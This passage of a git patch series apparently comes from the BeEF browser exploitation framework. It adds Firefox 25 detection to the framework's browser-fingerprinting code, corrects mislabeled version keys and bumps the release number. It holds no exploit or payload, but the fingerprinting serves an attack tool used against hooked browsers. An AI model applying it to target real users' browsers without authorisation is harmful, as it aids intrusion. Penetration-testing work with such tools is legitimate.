+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
+    },
+
     /**
      * Returns true if FF.
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25();
     },
 
     /**
@@ -756,8 +764,9 @@ beef.browser = {
             FF20:this.isFF20(), // Firefox 20
             FF21:this.isFF21(), // Firefox 21
             FF22:this.isFF22(), // Firefox 22
-            FF22:this.isFF23(), // Firefox 23
-            FF22:this.isFF24(), // Firefox 24
+            FF23:this.isFF23(), // Firefox 23
+            FF24:this.isFF24(), // Firefox 24
+            FF25:this.isFF25(), // Firefox 25
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -1041,6 +1050,10 @@ beef.browser = {
             return '24'
         }
         ;   // Firefox 24
+        if (this.isFF25()) {
+            return '25'
+        }
+        ;   // Firefox 25
 
         if (this.isIE6()) {
             return '6'

From 8875674f3b26022ff7880f28de9e63f853099417 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 5 Nov 2013 15:47:39 +1030
Subject: [PATCH 397/397] Update version to '0.4.4.9-alpha'

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index e4521c4f2..683cbeb1e 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.8-alpha
+0.4.4.9-alpha
diff --git a/config.yaml b/config.yaml
index 42055a5e2..970cfc3ac 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.8-alpha'
+    version: '0.4.4.9-alpha'
     debug: false
 
     restrictions: